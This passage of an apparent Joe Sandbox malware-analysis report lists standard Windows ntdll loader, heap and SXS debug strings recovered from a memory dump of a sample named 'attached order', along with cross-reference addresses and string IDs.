                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017E8923
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • API String ID: 0-108210295
                                                                                          Strings
                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A5215, 017A52A1, 017A5324
                                                                                          • Critical section debug info address, xrefs: 017A522A, 017A5339
                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A52ED
                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 017A534E
                                                                                          • Invalid debug info address of this critical section, xrefs: 017A52C1
                                                                                          • corrupted critical section, xrefs: 017A52CD
                                                                                          • Critical section address, xrefs: 017A5230, 017A52C7, 017A533F
                                                                                          • undeleted critical section in freed memory, xrefs: 017A5236
                                                                                          • Address of the debug info found in the active list., xrefs: 017A52B9, 017A5305
                                                                                          • 8, xrefs: 017A50EE
                                                                                          • Critical section address., xrefs: 017A530D
                                                                                          • double initialized or corrupted critical section, xrefs: 017A5313
                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017A52D9
                                                                                          • Thread identifier, xrefs: 017A5345
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • API String ID: 0-2368682639
                                                                                          Strings
                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017A20EE
                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 017A2213
                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 017A22A2
                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 017A221C
                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 017A2429
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 017A2310
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 017A242E
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017A23F5
                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 017A240C
                                                                                          • @, xrefs: 017A23A5
                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017A22CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • API String ID: 0-4009184096
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                          • API String ID: 0-2515994595
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-3197712848
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          • API String ID: 0-1357697941
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                          • API String ID: 2994545307-3063724069
                                                                                          Strings
                                                                                          • VerifierFlags, xrefs: 017B88D0
                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B86BD
                                                                                          • HandleTraces, xrefs: 017B890F
                                                                                          • VerifierDlls, xrefs: 017B893D
                                                                                          • VerifierDebug, xrefs: 017B8925
                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 017B880F
                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B86E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                          • API String ID: 0-3223716464
                                                                                          Strings
                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 017B4A75
                                                                                          • LdrpProtectedCopyMemory, xrefs: 017B4A74
                                                                                          • ***Exception thrown within loader***, xrefs: 017B4AA7
                                                                                          • LdrpGenericExceptionFilter, xrefs: 017B4A7C
                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 017B4AB8
                                                                                          • Execute '.cxr %p' to dump context, xrefs: 017B4B31
                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 017B4A86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                          • API String ID: 0-2973941816
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                          • API String ID: 0-1109411897
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                          • API String ID: 0-4098886588
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-792281065
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017897A0, 017897C9
                                                                                          • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01789790
                                                                                          • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0178977C
                                                                                          • apphelp.dll, xrefs: 01726446
                                                                                          • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017897B9
                                                                                          • LdrpInitShimEngine, xrefs: 01789783, 01789796, 017897BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-204845295
                                                                                          Strings
                                                                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A7FF0
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0176C5E3
                                                                                          • Loading import redirection DLL: '%wZ', xrefs: 017A7F7B
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 017A7F8C, 017A8000
                                                                                          • LdrpInitializeImportRedirection, xrefs: 017A7F82, 017A7FF6
                                                                                          • LdrpInitializeProcess, xrefs: 0176C5E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-475462383
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A1FA9
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A1FC9
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A1F82
                                                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A1F8A
                                                                                          • RtlGetAssemblyStorageRoot, xrefs: 017A1F6A, 017A1FA4, 017A1FC4
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 017A1F6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                          • API String ID: 0-861424205
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                          • API String ID: 0-2518169356
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                          • API String ID: 0-379654539
                                                                                          Strings
                                                                                          • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176847E
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01768341
                                                                                          • @, xrefs: 017684B1
                                                                                          • LdrpInitializeProcess, xrefs: 01768342
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1918872054
                                                                                          Strings
                                                                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 017953BB
                                                                                          • HEAP: , xrefs: 017952ED, 017953AE
                                                                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 017952FA
                                                                                          • HEAP[%wZ]: , xrefs: 017952DE, 0179539F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                          • API String ID: 0-1657114761
                                                                                          Strings
                                                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A20C0
                                                                                          • .Local, xrefs: 017627F8
                                                                                          • SXS: %s() passed the empty activation context, xrefs: 017A1FE8
                                                                                          • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A1FE3, 017A20BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                          • API String ID: 0-1239276146
                                                                                          Strings
                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3241
                                                                                          • RtlDeactivateActivationContext, xrefs: 017A322F, 017A323C, 017A325B
                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A3234
                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3260
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                          • API String ID: 0-1245972979
                                                                                          Strings
                                                                                          • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790DEC
                                                                                          • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01790EB5
                                                                                          • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01790E72
                                                                                          • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01790E2F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                          • API String ID: 0-1468400865
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrsnap.c, xrefs: 017A344A, 017A3476
                                                                                          • LdrpFindDllActivationContext, xrefs: 017A3440, 017A346C
                                                                                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A3439
                                                                                          • Querying the active activation context failed with status 0x%08lx, xrefs: 017A3466
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                          • API String ID: 0-3779518884
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                          • API String ID: 0-336120773
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 0179A7AF
                                                                                          • apphelp.dll, xrefs: 01752382
                                                                                          • LdrpDynamicShimModule, xrefs: 0179A7A5
                                                                                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A79F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-176724104
                                                                                          Strings
                                                                                          • HEAP: , xrefs: 01743184
                                                                                          • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174319D
                                                                                          • HEAP[%wZ]: , xrefs: 01743175
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                          • API String ID: 0-617086771
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-4253913091
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: $@
                                                                                          • API String ID: 2994545307-1077428164
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: FilterFullPath$UseFilter$\??\
                                                                                          • API String ID: 0-2779062949
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01799F2E
                                                                                          • Failed to allocated memory for shimmed module list, xrefs: 01799F1C
                                                                                          • LdrpCheckModule, xrefs: 01799F24
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-161242083
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-1334570610
                                                                                          Strings
                                                                                          • @, xrefs: 0172CD03
                                                                                          • InstallLanguageFallback, xrefs: 0172CD1F
                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0172CCD4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                                          • API String ID: 0-1757540487
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 017A80F3
                                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 017A80E9
                                                                                          • Failed to reallocate the system dirs string !, xrefs: 017A80E2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                          • API String ID: 0-1783798831
                                                                                          Strings
                                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 017B4519
                                                                                          • LdrpCheckRedirection, xrefs: 017B450F
                                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4508
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                          • API String ID: 0-3154609507
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                          • API String ID: 0-2558761708
                                                                                          Strings
                                                                                          • LdrResSearchResource Enter, xrefs: 0173A933
                                                                                          • LdrResSearchResource Exit, xrefs: 0173A945
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                          • API String ID: 0-4066393604
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: Legacy$UEFI
                                                                                          • API String ID: 2994545307-634100481
                                                                                          Strings
                                                                                          • LdrpResGetMappingSize Exit, xrefs: 0173AB9C
                                                                                          • LdrpResGetMappingSize Enter, xrefs: 0173AB8A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                                                                          • API String ID: 0-1497657909
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$Flst
                                                                                          • API String ID: 0-758220159
                                                                                          Strings
                                                                                          • kLsE, xrefs: 017305FE
                                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 01730586
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_1700000_attached order.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                          • API String ID: 0-2547482624
                                                                                          Strings
                                                                                          • RtlpInsertAssemblyStorageMapEntry, xrefs: 017A2611
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: AssemblyRosterIndex : 0x%lxSXS: Map->AssemblyCount : 0x%lxSXS: StorageLocation : %pSXS: StorageLocation->Length: 0x%xSXS: StorageLocation->Buffer: %pSXS: OpenDirectoryHand, xrefs: 017A2616
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
